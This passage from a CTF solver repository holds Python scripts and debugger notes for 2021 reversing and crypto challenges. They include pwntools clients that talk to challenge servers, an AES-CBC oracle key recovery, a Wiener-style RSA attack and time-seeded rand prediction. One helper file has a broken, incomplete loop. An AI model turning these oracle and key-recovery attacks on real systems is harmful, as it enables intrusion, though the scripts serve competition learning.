0x555555556062, 0x555555556028, 0x555555556008, 0x555555556028, 0x555555556062, 0x555555556040, 0x555555556062, 0x555555556062] 53 | arr_43e0 = [0x555555556040, 0x555555556040, 0x555555556040, 0x555555556028, 0x555555556062, 0x555555556062, 0x555555556040, 0x555555556028, 0x555555556040, 0x555555556040, 0x555555556040, 0x555555556040, 0x555555556062, 0x555555556040, 0x555555556062, 0x555555556028, 0x555555556062, 0x555555556028, 0x555555556040, 0x555555556028, 0x555555556062, 0x555555556040, 0x555555556028, 0x555555556040, 0x555555556028, 0x555555556040, 0x555555556040, 0x555555556028, 0x555555556028, 0x555555556028, 0x555555556028, 0x555555556062, 0x555555556028] 54 | flag = [] 55 | for k,j in enumerate(target): 56 | tmp_f = [] 57 | for i in range(0,len(arr_4080),2): 58 | tmp1 = sub_2008(arr_4080[i],arr_4080[i+1])&0xffffffff 59 | tmp2 = sub_2028(arr_4080[i],arr_4080[i+1])&0xffffffff 60 | tmp3 = sub_2040(arr_4080[i],arr_4080[i+1])&0xffffffff 61 | tmp4 = sub_2062(arr_4080[i],arr_4080[i+1])&0xffffffff 62 | if(tmp1==j or tmp2==j or tmp3==j or tmp4==j): 63 | tmp_f.append(decode(arr_43e0[i/2],arr_41a0[i],arr_41a0[i+1])) 64 | flag.append(tmp_f) 65 | for i in flag: 66 | print(i) -------------------------------------------------------------------------------- /solver/2021/IJCTF2021/time: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2021/IJCTF2021/time -------------------------------------------------------------------------------- /solver/2021/angstrom2021/debug_ffs: -------------------------------------------------------------------------------- 1 | 0x555555555508 // don't know what is rax value 2 | 3 | 0x000055555555529d // get urandom value 4 | 0x0000555555555311 // get key 5 | 6 | 0xd value known ( urandom ) 7 | 8 | xor value known ( static value ) 9 | 10 | Num Type Disp Enb Address What 11 | 1 breakpoint keep y 0x00005555555553ef 12 | 5 breakpoint keep y 0x0000555555555575 13 | 6 breakpoint keep y 0x00005555555555a5 14 | 7 breakpoint keep y 0x0000555555555627 15 | 16 | #al value from us 17 | 18 | rbp-0x380354 = counter 19 | 0x7fffffffde10 20 | 21 | send % 22 | output from first is bd5 argument -------------------------------------------------------------------------------- /solver/2021/angstrom2021/debug_lockpicking: -------------------------------------------------------------------------------- 1 | 0x555555555690 ( 2 | $rdi = 0x00007fffffffd860 → 0x0000000000000000, 3 | $rsi = 0x0000000000000041, 4 | $rdx = 0x00007fffffffd85c → 0x0000000000000000 5 | ) 6 | 7 | 8 | gef➤ x/2x $rdx-0x1d0 9 | 0x7fffffffd6fd: 0x20202020 0x20202020 10 | 11 | 12 | a1+4 13 | M = (a1+4) + 43 14 | m = (a1+4) + 1 15 | 16 | 17 | a1 = v7 % 28; i 18 | (a1 + 4) = v8 % 44 m 19 | (a1 + 8) = v6 % 56 o 20 | 21 | cek 22 | *(_BYTE *)(a1 + 15) = v18 = a1+0x12 23 | a1+15 == a+13 -> a1+16 = 0 24 | 25 | 18 - a1+4 == 11,a1 == 22 26 | 16 - a1+8 == 13, a1+4 == 37 , a1 == 6, a1+13 == 0 , a1+15==0 -> a1+14=0 else a1+14=1 27 | 15 - a1+13 == 0, a1+8 == 7,a1+15 == 0 , a1+18 == 0,a1+4 ==8 ,a1 == 9 , a1+16 == 1 28 | 17 - !,v2!=7,v2!=13 -> a1+16 = 0 -> a1+15 == 1 , a1+18 >= 1 , a1+16 == 0 29 | 14 - a1+4,a1+8 != 0 30 | 31 | IIIIIImmmmmmmmmmmooooooo -> 22,11,7 32 | iiiiiiiiiiiiMMMMMMMMMMMMMMMMMMoooooo 6,37,13 33 | !OOOOOOmmmmmmmmmmmmmmmiii! 34 | ! 35 | 36 | IIIIIImmmmmmmmmmmoooooooiiiiiiiiiiiiMMMMMMMMMMMMMMMMMMoooooo!OOOOOOmmmmmmmmmmmmmmmiii!!!IIIMMMMMMMMMMMMMMMoooooo 37 | mmmmmmmOOOOOOOOOOOOOIIIIII 38 | 39 | 16 - ooooooooooooo , MMMMMMM , iiiiii 40 | 15 - OOOOOO , mmmmmmmmmmmmmmm , iii 41 | 18 - !mmm , iiiiiiiiiiiii 42 | 43 | 0x5555555555cf 44 | -------------------------------------------------------------------------------- /solver/2021/angstrom2021/solver_flow.py: -------------------------------------------------------------------------------- 1 | import os 2 | import zlib 3 | import string 4 | 5 | def keystream(key): 6 | index = 0 7 | while 1: 8 | index+=1 9 | if index >= len(key): 10 | key += zlib.crc32(key).to_bytes(4,'big') 11 | yield key[index] 12 | 13 | f=open("enc","rb") 14 | ciphertext = f.read() 15 | f.close() 16 | for i in range(0xff+1): 17 | for j in range(0xff+1): 18 | key = i.to_bytes(1,'big')+j.to_bytes(1,'big') 19 | ks = keystream(key) 20 | poss = "" 21 | for k in ciphertext: 22 | tmp = chr(k^next(ks)) 23 | if(tmp in string.printable): 24 | poss += tmp 25 | else: 26 | break 27 | if(len(poss)==len(ciphertext)): 28 | print(i,j) 29 | print(poss) 30 | -------------------------------------------------------------------------------- /solver/2021/angstrom2021/solver_free.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from z3 import * 3 | 4 | z = 31337 5 | x = Int('x') 6 | y = Int('y') 7 | s = Solver() 8 | s.add(x+y == 1142) 9 | s.add(x*y == 302937) 10 | s.check() 11 | m = s.model() 12 | x = str(m[x]) 13 | y = str(m[y]) 14 | r = remote("shell.actf.co",21703) 15 | r.recvuntil("???") 16 | r.sendline(str(z)) 17 | r.recvuntil("???") 18 | r.sendline(x+" "+y) 19 | r.recvuntil("???") 20 | r.sendline("banana") 21 | r.interactive() -------------------------------------------------------------------------------- /solver/2021/angstrom2021/solver_fss.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import string 3 | from ctypes import * 4 | from Crypto.Util.number import bytes_to_long as b2l 5 | import string 6 | 7 | libc = CDLL("libc.so.6") 8 | 9 | def bd5(a1): 10 | libc.srand(a1 ^ 0xBC614E) 11 | v2 = 0 12 | for i in range(8): 13 | v2 = libc.rand() % 10 + 10 * v2 14 | return a1 * v2 15 | 16 | # context.log_level='debug' 17 | 18 | xor_key = [0xde, 0xad, 0xbe, 0xef, 0xfe, 0xed, 0xca, 0xfe, 0x13, 0x37, 0xab, 0xcd, 0xef] 19 | # r=remote("localhost",21450) 20 | r=remote("rev.2021.chall.actf.co",21450) 21 | tmp = r.recvn(13) 22 | random_val = "" 23 | for i in range(len(xor_key)): 24 | random_val += chr(xor_key[i]^ord(tmp[i])) 25 | a1 = 0x13371337 26 | flag = "" 27 | # for i in range(1): 28 | while '}' not in flag: 29 | print(flag) 30 | bd5_val = p64(bd5(a1)) 31 | for j in string.printable[:-6]: 32 | # print j 33 | payload = bd5_val+j+random_val 34 | # print(payload.encode('hex')) 35 | r.send(payload) 36 | check = r.recvn(1) 37 | if(check!='\r'): 38 | a1 = b2l(r.recvn(4)) 39 | flag += j 40 | break 41 | print(flag) 42 | # r.interactive() -------------------------------------------------------------------------------- /solver/2021/angstrom2021/solver_hrc.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # list_char = '0123456789abcdef' 4 | list_enc = [] 5 | # r = process("./real_hrc.py") 6 | r = remote("crypto.2021.chall.actf.co",21602) 7 | for i in range(0xff+1): 8 | r.recvuntil("[2]?") 9 | r.sendline("1") 10 | r.recvuntil("encrypt:") 11 | payload = hex(i)[2:].rjust(2,'0')*16 12 | # print(payload) 13 | r.sendline(payload) 14 | enc = r.recvline() 15 | list_enc.append(enc.strip().decode('hex')) 16 | 17 | r.recvuntil("[2]?") 18 | r.sendline("2") 19 | 20 | for _ in range(10): 21 | r.recvuntil("this: ") 22 | target = r.recvline().strip() 23 | counter = 0 24 | result = "" 25 | for i in target.decode('hex'): 26 | # print(ord(i)) 27 | result += list_enc[ord(i)][counter%16].encode('hex') 28 | counter += 1 29 | r.sendline(result) 30 | r.interactive() -------------------------------------------------------------------------------- /solver/2021/angstrom2021/solver_infinity.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | import time 3 | from pwn import * 4 | import string 5 | 6 | def gen_key(length): 7 | xor_key = [] 8 | v12 = 0 9 | for i in range(length): 10 | xor_key.append(v12) 11 | v12 += 17 12 | return xor_key 13 | 14 | libc = CDLL("libc.so.6") 15 | tmp = int(time.time())+1 16 | v5 = 1337 17 | 18 | # r = process("./infinity_gauntlet") 19 | r = remote("shell.actf.co",21700) 20 | r.recvuntil(" ===\n") 21 | for tm in range(tmp,tmp+1): 22 | libc.srand(tm) 23 | guess = [] 24 | for v3 in range(49): 25 | result = libc.rand() 26 | v18 = libc.rand() 27 | v19 = (v18 & 0xffff) 28 | 29 | if(libc.rand()&1): 30 | v14 = libc.rand() % 3 31 | if(v14): 32 | if(v14==1): 33 | v30 = libc.rand() 34 | v31 = v30 - ( 1337 * ((1644744395 * v30 >> 41) ) - (v30 >> 31)) 35 | v31 &= 0xffffffff 36 | else: 37 | v15 = libc.rand() 38 | v16 = v15 - 1337 * ((1644744395 * v15 >> 41) - (v15 >> 31)) 39 | else: 40 | v24 = libc.rand() 41 | v25 = v24 - 1337 * ((1644744395 * v24 >> 41) - (v24 >> 31)) 42 | else: 43 | v20 = libc.rand() 44 | if(v20&3): 45 | v21 = v20 % 4 46 | if(v21 == 1): 47 | v32 = libc.rand() % v5 48 | v33 = libc.rand() 49 | v34 = (v33 >> 31) 50 | v34 = v33 % v5 51 | elif(v21 == 2): 52 | v35 = libc.rand() % v5 53 | v36 = libc.rand() 54 | v37 = (v36 >> 31) 55 | v37 = v36 % v5 56 | else: 57 | if(v19 <= 0x539): 58 | v23 = libc.rand() % v19 59 | else: 60 | v22 = libc.rand() 61 | v23 = v22 - 1337 * ((1644744395 * v22 >> 41) - (v22 >> 31)) 62 | else: 63 | v26 = libc.rand() 64 | v27 = v26 - 1337 * ((1644744395 * v26 >> 41) - (v26 >> 31)) 65 | v28 = libc.rand() 66 | v29 = v28 - 1337 * ((1644744395 * v28 >> 41) - (v28 >> 31)) 67 | guess.append(v19) 68 | for i in guess: 69 | r.sendline(str(i)) 70 | 71 | 72 | enc = [] 73 | rand_val = [] 74 | for i in range(40): 75 | result = libc.rand() 76 | rand_val.append(result) 77 | r.recvuntil("=== ROUND "+str(50+i)+" ===\n") 78 | tmp = r.recvline().strip() 79 | tmp2 = tmp.split(b" = ") 80 | equation_result = tmp2[1] 81 | equation = tmp2[0][4:-1].split(b", ") 82 | if(b"bar" in tmp): 83 | if(b'?' in equation): 84 | position = equation.index(b'?') 85 | equation_result = int(equation_result) 86 | if(position == 0): 87 | libc.rand() 88 | libc.rand() 89 | libc.rand() 90 | libc.rand() 91 | v27 = int(equation[1]) 92 | v29 = int(equation[2]) 93 | v19 = equation_result - v27 * (v29 + 1) 94 | elif(position == 1): 95 | libc.rand() 96 | libc.rand() 97 | libc.rand() 98 | libc.rand() 99 | v32 = int(equation[0]) 100 | v34 = int(equation[2]) 101 | v19 = ( equation_result - v32 ) // (v34 + 1) 102 | else: 103 | libc.rand() 104 | libc.rand() 105 | libc.rand() 106 | libc.rand() 107 | v35 = int(equation[0]) 108 | v37 = int(equation[1]) 109 | v19 = ( ( equation_result - v35 ) // v37 ) - 1 110 | else: 111 | libc.rand() 112 | libc.rand() 113 | libc.rand() 114 | eq0 = int(equation[0]) 115 | eq1 = int(equation[1]) 116 | eq2 = int(equation[2]) 117 | v23 = eq1 118 | v19 = ( eq2 + 1 ) * v23 119 | if(v19%v23!=eq0): 120 | for i in range(v23): 121 | v19 += 1 122 | if(v19%v23==eq0): 123 | break 124 | 125 | else: 126 | if(b'?' in equation): 127 | position = equation.index(b'?') 128 | equation_result = int(equation_result) 129 | if(position == 0): 130 | libc.rand() 131 | libc.rand() 132 | libc.rand() 133 | v25 = int(equation[1]) 134 | v19 = equation_result ^ 0x539 ^ (v25 + 1) 135 | else: 136 | libc.rand() 137 | libc.rand() 138 | libc.rand() 139 | v31 = int(equation[0]) 140 | v19 = ( equation_result ^ 0x539 ^ v31 ) - 1 141 | else: 142 | libc.rand() 143 | libc.rand() 144 | libc.rand() 145 | eq1 = int(equation[0]) 146 | eq2 = int(equation[1]) 147 | v16 = eq2 148 | v19 = eq1 ^ 0x539 ^ (v16 + 1) 149 | enc.append(v19) 150 | r.sendline(str(v19)) 151 | 152 | print("rand_val = ",rand_val) 153 | print("enc = ",enc) 154 | counter = 50 155 | length_flag = 17 156 | fix_flag = [-1 for i in range(length_flag)] 157 | for i in range(len(rand_val)): 158 | index = rand_val[i] % length_flag 159 | brute = (index + counter) << 8 160 | for j in range(0xff): 161 | if(brute|j==enc[i]): 162 | fix_flag[index] = j 163 | break 164 | counter += 1 165 | xor_key = gen_key(length_flag) 166 | fixx = ['?' for i in range(length_flag)] 167 | for i in range(len(fix_flag)): 168 | if(fix_flag[i]!=-1): 169 | fixx[i] = chr((fix_flag[i]^xor_key[i])&0xff) 170 | print(''.join(fixx)) -------------------------------------------------------------------------------- /solver/2021/angstrom2021/solver_jailbreak.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | def get1337(): 4 | target = 1337 5 | gr = [] 6 | while(target!=1): 7 | if(target%2==0): 8 | target//=2 9 | gr.append("press the red button") 10 | else: 11 | target-=1 12 | target//=2 13 | gr.append("press the green button") 14 | for i in gr[::-1]: 15 | r.recvuntil("do?") 16 | r.sendline(i) 17 | r.recvuntil("do?") 18 | r.sendline("bananarama") 19 | 20 | context.log_level = 'debug' 21 | # r = process("./jailbreak") 22 | r = remote("shell.actf.co", 21701) 23 | list_command = """look around 24 | sleepa 25 | pick the snake up 26 | throw the snake at kmh 27 | pry the bars open 28 | look around""".split("\n") 29 | for i in list_command: 30 | r.recvuntil("do?") 31 | r.sendline(i) 32 | get1337() 33 | r.interactive() -------------------------------------------------------------------------------- /solver/2021/angstrom2021/solver_key.py: -------------------------------------------------------------------------------- 1 | import string 2 | 3 | list_char = list(string.ascii_lowercase) 4 | key = ['?' for i in list_char] 5 | f = open("out.txt","r") 6 | target = f.read() 7 | f.close() 8 | # target = "jnjjo wow psh jpat{kjgzs}" 9 | 10 | known = "qufxtcvbmywzdghkoiasr" 11 | plain = "actfordingehsupwylkbm" 12 | for i in range(len(plain)): 13 | key[list_char.index(plain[i])] = known[i] 14 | print(key) 15 | 16 | dec = "" 17 | for i in target: 18 | if(i in key): 19 | dec += list_char[key.index(i)] 20 | else: 21 | dec += i 22 | # elif(i == ' '): 23 | # dec += ' ' 24 | # else: 25 | # dec += '?' 26 | print(dec) 27 | 28 | flag = "qufx{awowvuqwdqcrtcwibawdgsdfbfgfbtm}" 29 | counter = 0 30 | for i in flag: 31 | if(i in known): 32 | counter+=1 33 | if(counter==len(flag)-2): 34 | print("You got it!") -------------------------------------------------------------------------------- /solver/2021/angstrom2021/solver_random.py: -------------------------------------------------------------------------------- 1 | from functools import reduce 2 | from pwn import * 3 | class Generator(): 4 | DIGITS = 8 5 | def __init__(self, seed): 6 | self.seed = seed 7 | print(seed) 8 | assert(len(str(self.seed)) == self.DIGITS) 9 | 10 | def getNum(self): 11 | print("pow",self.seed**2) 12 | self.seed = int(str(self.seed**2).rjust(self.DIGITS*2, "0")[self.DIGITS//2:self.DIGITS + self.DIGITS//2]) 13 | print("return",self.seed) 14 | return self.seed 15 | 16 | def factors(n): 17 | return list(reduce(list.__add__, ([i, n//i] for i in range(1, int(n**0.5) + 1) if n % i == 0))) 18 | 19 | 20 | r = remote("crypto.2021.chall.actf.co",21600) 21 | r.recvuntil("?") 22 | r.sendline("r") 23 | target1 = int(r.recvline().strip()) 24 | r.recvuntil("?") 25 | r.sendline("r") 26 | target2 = int(r.recvline().strip()) 27 | r.recvuntil("?") 28 | r.sendline("g") 29 | tmp = factors(target1) 30 | possible = [] 31 | for i in range(0,len(tmp),2): 32 | if(len(str(tmp[i]))==len(str(tmp[i+1]))): 33 | tmp2 = [] 34 | tmp2.append(tmp[i]) 35 | tmp2.append(tmp[i+1]) 36 | possible.append(tmp2) 37 | for i in possible: 38 | r1 = Generator(i[0]) 39 | r2 = Generator(i[1]) 40 | if(r1.getNum()*r2.getNum()==target2): 41 | print(i[0]) 42 | print(i[1]) 43 | break 44 | r.sendline(str(r1.getNum()*r2.getNum())) 45 | r.recvuntil("?") 46 | r.sendline(str(r1.getNum()*r2.getNum())) 47 | r.interactive() -------------------------------------------------------------------------------- /solver/2021/angstrom2021/solver_rsa.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import * 2 | 3 | p = 11556895667671057477200219387242513875610589005594481832449286005570409920461121505578566298354611080750154513073654150580136639937876904687126793459819369 4 | q = 9789731420840260962289569924638041579833494812169162102854947552459243338614590024836083625245719375467053459789947717068410632082598060778090631475194567 5 | e = 65537 6 | d = pow(e,-1,(p-1)*(q-1)) 7 | n = p*q 8 | c = 108644851584756918977851425216398363307810002101894230112870917234519516101802838576315116490794790271121303531868519534061050530562981420826020638383979983010271660175506402389504477695184339442431370630019572693659580322499801215041535132565595864123113626239232420183378765229045037108065155299178074809432 9 | print(long_to_bytes(pow(c,d,n))) -------------------------------------------------------------------------------- /solver/2021/angstrom2021/solver_sosig.py: -------------------------------------------------------------------------------- 1 | from continued_fractions import * 2 | n = 14750066592102758338439084633102741562223591219203189630943672052966621000303456154519803347515025343887382895947775102026034724963378796748540962761394976640342952864739817208825060998189863895968377311649727387838842768794907298646858817890355227417112558852941256395099287929105321231423843497683829478037738006465714535962975416749856785131866597896785844920331956408044840947794833607105618537636218805733376160227327430999385381100775206216452873601027657796973537738599486407175485512639216962928342599015083119118427698674651617214613899357676204734972902992520821894997178904380464872430366181367264392613853 3 | e = 1565336867050084418175648255951787385210447426053509940604773714920538186626599544205650930290507488101084406133534952824870574206657001772499200054242869433576997083771681292767883558741035048709147361410374583497093789053796608379349251534173712598809610768827399960892633213891294284028207199214376738821461246246104062752066758753923394299202917181866781416802075330591787701014530384229203479804290513752235720665571406786263275104965317187989010499908261009845580404540057576978451123220079829779640248363439352875353251089877469182322877181082071530177910308044934497618710160920546552403519187122388217521799 4 | c = 13067887214770834859882729083096183414253591114054566867778732927981528109240197732278980637604409077279483576044261261729124748363294247239690562657430782584224122004420301931314936928578830644763492538873493641682521021685732927424356100927290745782276353158739656810783035098550906086848009045459212837777421406519491289258493280923664889713969077391608901130021239064013366080972266795084345524051559582852664261180284051680377362774381414766499086654799238570091955607718664190238379695293781279636807925927079984771290764386461437633167913864077783899895902667170959671987557815445816604741675326291681074212227 5 | def egcd(a, b): 6 | if a == 0: return (b, 0, 1) 7 | g, x, y = egcd(b % a, a) 8 | return (g, y - (b // a) * x, x) 9 | 10 | def mod_inv(a, m): 11 | g, x, _ = egcd(a, m) 12 | return (x + m) % m 13 | 14 | def isqrt(n): 15 | x = n 16 | y = (x + 1) // 2 17 | while y < x: 18 | x = y 19 | y = (x + n // x) // 2 20 | return x 21 | 22 | def crack_rsa(e, n): 23 | frac = rational_to_contfrac(e, n) 24 | convergents = convergents_from_contfrac(frac) 25 | 26 | for (k, d) in convergents: 27 | if k != 0 and (e * d - 1) % k == 0: 28 | phi = (e * d - 1) // k 29 | s = n - phi + 1 30 | # check if x*x - s*x + n = 0 has integer roots 31 | D = s * s - 4 * n 32 | if D >= 0: 33 | sq = isqrt(D) 34 | if sq * sq == D and (s + sq) % 2 == 0: return d 35 | 36 | d = crack_rsa(e, n) 37 | m = hex(pow(c, d, n)).rstrip("L")[2:] 38 | print(m.decode("hex")) -------------------------------------------------------------------------------- /solver/2021/angstrom2021/solver_xor.py: -------------------------------------------------------------------------------- 1 | enc = "ae27eb3a148c3cf031079921ea3315cd27eb7d02882bf724169921eb3a469920e07d0b883bf63c018869a5090e8868e331078a68ec2e468c2bf13b1d9a20ea0208882de12e398c2df60211852deb021f823dda35079b2dda25099f35ab7d218227e17d0a982bee7d098368f13503cd27f135039f68e62f1f9d3cea7c".decode('hex') 2 | flag = "actf{" 3 | for j in range(0,len(enc),5): 4 | key = [] 5 | tmp = enc[j:j+5] 6 | for i in range(5): 7 | key.append(ord(flag[i])^ord(tmp[i])) 8 | result = "" 9 | cnt = 0 10 | for i in range(j,len(enc)): 11 | result += chr(key[cnt%len(key)]^ord(enc[i])) 12 | cnt += 1 13 | print result -------------------------------------------------------------------------------- /solver/2021/canberra2021/helper_enlight.py: -------------------------------------------------------------------------------- 1 | import glob 2 | list_file = glob.glob("cache/*.pyc") 3 | # print(list_file) 4 | a = bytearray([0x42,0xd,0xd,0xa,0x1,0x00,0x00,0x00,0x33,0x84,0xd6,0x18,0x31,0x13,0xf7,0xbc]) 5 | 6 | for i in list_file: 7 | f = open(i,"rb") 8 | tmp = f.read() 9 | f.close() 10 | tmp = a+tmp[12:] 11 | f = open(i,"wb") 12 | f.write(tmp) 13 | f.close() -------------------------------------------------------------------------------- /solver/2021/canberra2021/tcp_networking.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 3.7.4 2 | # Python bytecode 3.7 (3394) 3 | # Decompiled from: Python 2.7.18 (default, Mar 8 2021, 13:02:45) 4 | # [GCC 9.3.0] 5 | # Warning: this version of Python has problems handling the Python 3 "byte" type in constants properly. 6 | 7 | # Embedded file name: tcp_networking.py 8 | # Compiled at: 1983-03-17 08:15:31 9 | # Size of source mod 2**32: 3170308913 bytes 10 | from twisted.internet import protocol, reactor, endpoints 11 | from twisted.internet.task import LoopingCall 12 | from clienthandler import ClientController 13 | import json 14 | 15 | class EnlightenProtocol(protocol.Protocol): 16 | 17 | def __init__(self): 18 | self.report_position = LoopingCall(self.sendPosition) 19 | 20 | def connectionMade(self): 21 | self.report_position.start(1) 22 | 23 | def sendPosition(self): 24 | cc = ClientController.getInstance() 25 | data = {'uid':str(cc.uid), 'pos':cc.player_x} 26 | print(ClientController.getInstance().player_x) 27 | print("send",data) 28 | if ClientController.getInstance().player_x > 0: 29 | self.transport.write(bytes([ 30 | 71, 69, 84, 0, 69, 78, 76, 0, 73, 71, 72, 0, 84, 69, 78, 69, 68])) 31 | return 32 | self.transport.write(bytes((json.dumps(data)), encoding='utf-8')) 33 | 34 | def dataReceived(self, data: bytes): 35 | try: 36 | raw_data = json.loads(data.decode()) 37 | if 0 in raw_data: 38 | ClientController.getInstance().blit_data.append(raw_data[0]) 39 | else: 40 | ClientController.getInstance().handle_player_data(raw_data) 41 | except json.decoder.JSONDecodeError: 42 | return 43 | 44 | 45 | class EnlightenFactory(protocol.ClientFactory): 46 | protocol = EnlightenProtocol 47 | 48 | def buildProtocol(self, addr): 49 | return EnlightenProtocol() -------------------------------------------------------------------------------- /solver/2021/codefest2021/helper_heavy.py: -------------------------------------------------------------------------------- 1 | import string 2 | from Crypto.Util.number import bytes_to_long as b2l 3 | 4 | target = [0xcd86, 0x26db, 0x571, 0x5346, 0x46c7, 0x1cbd, 0xfb0, 0x43db, 0xae6e, 0x13f7, 0xc263, 0xc505, 0x9639, 0x2e22] 5 | for j in range(0,len(target),2): 6 | for x 7 | rbp_a=0x4241 8 | rbp_8=0x4443 9 | rbp_6=0 10 | rbp_2=0x9e37 11 | for i in range(0x1f+1): 12 | eax = rbp_2 13 | rbp_6 += eax 14 | eax = rbp_8 15 | eax <<= 0x4 16 | edx = 0x2142 17 | eax += edx 18 | ecx = eax 19 | edx = rbp_8 20 | eax = rbp_6 21 | eax += edx 22 | # print(hex(ecx),hex(eax)) 23 | ecx ^= eax 24 | edx = ecx 25 | eax = rbp_8 26 | eax >>= 0x5 27 | ecx = 0x3421 28 | eax += ecx 29 | eax ^= edx 30 | # print(hex(rbp_a),hex(eax&0xffff)) 31 | rbp_a += (eax)&0xffff 32 | rbp_a &= 0xffff 33 | # print(hex(rbp_a)) 34 | eax = rbp_a 35 | eax <<= 0x4 36 | edx = 0x3511 37 | eax += edx 38 | ecx = eax 39 | edx = rbp_a 40 | eax = rbp_6 41 | eax += edx 42 | ecx ^= eax 43 | edx = ecx 44 | eax = rbp_a 45 | eax >>= 0x5 46 | ecx = 0x2425 47 | eax += ecx 48 | eax ^= edx 49 | rbp_8 += (eax)&0xffff 50 | rbp_8 &= 0xffff 51 | print(hex(rbp_a),hex(rbp_8)) 52 | # eax = rbp_4 53 | # eax += 1 54 | # rbp_4 = eax 55 | 56 | -------------------------------------------------------------------------------- /solver/2021/codefest2021/helper_picture.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | static_val=[] 4 | counter=0 5 | class SolverEquation(gdb.Command): 6 | def __init__ (self): 7 | super (SolverEquation, self).__init__ ("solve-equation",gdb.COMMAND_OBSCURE) 8 | 9 | def invoke (self, arg, from_tty): 10 | global static_val 11 | global counter 12 | tmp = ['1' for i in range(16)] 13 | for i in range(1): 14 | gdb.execute("file picture_shuru") 15 | # gdb.execute("b *0x555555554b8d") 16 | with open("input", "w") as f: 17 | tmp[12] = '5' 18 | f.write(''.join(tmp)) 19 | # print('ere') 20 | gdb.execute('r < input') 21 | check = gdb.execute('x/bx $rax+13',to_string=True) 22 | # val = addr2num(gdb.selected_frame().read_register("$rax")) 23 | check = int(check.strip().split(":\t")[1],16) 24 | target = 0x7c 25 | init = 0x78 26 | print("First Check",check!=init) 27 | print(counter,check,check==target) 28 | print("Correct Val : ",chr(check^target^ord('2'))) 29 | # static_val.append(check) 30 | # print('here') 31 | # gdb.execute('delete') 32 | gdb.execute('kill') 33 | counter+=1 34 | # gdb.execute("file picture_shuru") 35 | # print(static_val) 36 | # if(val == 0x7c): 37 | # print(i) 38 | # break 39 | # gdb.execute("r ") 40 | # gdb.execute("b *0x555555554b8d") 41 | # for i in range(0x14): 42 | # gdb.execute("c",to_string=True) 43 | # val = addr2num(gdb.selected_frame().read_register("r9d")) 44 | # static_val.append(val) 45 | # print(static_val) 46 | def addr2num(addr): 47 | try: 48 | return int(addr)&0xff # Python 3 49 | except: 50 | return long(addr) # Python 2 51 | SolverEquation() -------------------------------------------------------------------------------- /solver/2021/codefest2021/solver_anime.py: -------------------------------------------------------------------------------- 1 | f=open("anime.jpg","rb") 2 | tmp = f.read() 3 | f.close() 4 | f=open("anime.zip","wb") 5 | tmp2 = b"\x50" 6 | tmp2 += tmp[0x586d9+1:] 7 | f.write(tmp2) 8 | f.close() -------------------------------------------------------------------------------- /solver/2021/codefest2021/solver_binary.py: -------------------------------------------------------------------------------- 1 | from PIL import Image 2 | 3 | tmp = Image.new("RGB", (80,54)) 4 | f=open("qr.txt","r") 5 | qr = f.read() 6 | f.close() 7 | 8 | pixel = [] 9 | for i in qr: 10 | if(i=='1'): 11 | pixel.append((255,255,255)) 12 | else: 13 | pixel.append((0,0,0)) 14 | tmp.putdata(pixel) 15 | tmp = tmp.resize((800, 540), Image.ANTIALIAS) 16 | tmp.save('qr.png') 17 | -------------------------------------------------------------------------------- /solver/2021/codefest2021/solver_cbc.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from Crypto.Util.strxor import strxor 3 | 4 | # context.log_level='debug' 5 | # r=remote("chall.codefest.tech",9000) 6 | r=remote("chall.codefest.tech",9000) 7 | r.send("1") 8 | r.recvuntil("Enter hex to encrypt:") 9 | payload = "\x00"*16 10 | payload += "\x10"*32 11 | r.send(payload.encode('hex')) 12 | payload = r.recv(64) 13 | payload = payload.encode('hex') 14 | r.close() 15 | # print(tmp.encode('hex')) 16 | 17 | # payload = "2cb96047ab11f8537abc02090633668421fcb16373b99e7f97f85e423ad7209cd9c51fc277915ea83ba48b216bf2e092cbc18122be80f61927025f3d753adec6" 18 | r=remote("chall.codefest.tech",9000) 19 | tmp = "00"*16 20 | tmp += payload[:32] 21 | tmp += payload[32:] 22 | r.send("2") 23 | r.recvuntil("Enter hex to decrypt:") 24 | r.send(tmp) 25 | r.recv(16) 26 | iv = r.recv(16) 27 | key = strxor(iv,"\xff"*16) 28 | r.close() 29 | # print(key.encode('hex')) 30 | 31 | # key = "0b9782a96df88195046e30fa453d4a05" 32 | r=remote("chall.codefest.tech",9000) 33 | r.send("3") 34 | r.send(key.encode('hex')) 35 | r.interactive() 36 | # print(tmp1.encode('hex')) 37 | # print(tmp2.encode('hex')) 38 | # iv = strxor(tmp1,tmp2) 39 | # print(iv.encode('hex')) 40 | 41 | # payload = strxor("\xff"*16,tmp.decode('hex')) 42 | # print payload.encode('hex') 43 | # print(tmp.encode('hex')) 44 | # payload = strxor("\xff"*16,tmp) 45 | # r.send("3") 46 | # r.recvuntil("Give me the key:") 47 | # r.send(payload.encode('hex')) 48 | # r.interactive() 49 | # print(r.recvline()) -------------------------------------------------------------------------------- /solver/2021/codefest2021/solver_heavy.py: -------------------------------------------------------------------------------- 1 | import string 2 | from pwn import * 3 | from itertools import product 4 | 5 | payload = ['A' for i in range(0x1d)] 6 | counter = 0 7 | flag = "" 8 | context.log_level='CRITICAL' 9 | payload[0] = '0' 10 | payload[1] = '2' 11 | payload[2] = '5' 12 | payload[3] = "-" 13 | for counter in range(0,2,2): 14 | for i in product(string.printable[:-6],repeat=4): 15 | payload[4] = i[0] 16 | payload[5] = i[1] 17 | payload[6] = i[2] 18 | payload[7] = i[3] 19 | # print("".join(payload)) 20 | r = process("./heavydriver1") 21 | r.recvuntil("flag\n") 22 | r.sendline("".join(payload)) 23 | # r.sendline(flag+"".join(payload)) 24 | tmp = r.recvuntil("[").strip("[") 25 | # print(tmp) 26 | if(tmp.count("2")==(counter/2)+1 or tmp.count("2")==1 or tmp.count("1")>1): 27 | flag += i[0]+i[1]+i[2]+i[3] 28 | # payload = payload[-4:] 29 | print(flag,i) 30 | break 31 | r.close() 32 | # for i in string.printable[:-6]: 33 | # print(i) 34 | # for j in string.printable[:-6]: 35 | # payload[counter] = i 36 | # payload[counter+1] = j 37 | # r = process("./heavydriver1") 38 | # r.recvuntil("flag\n") 39 | # 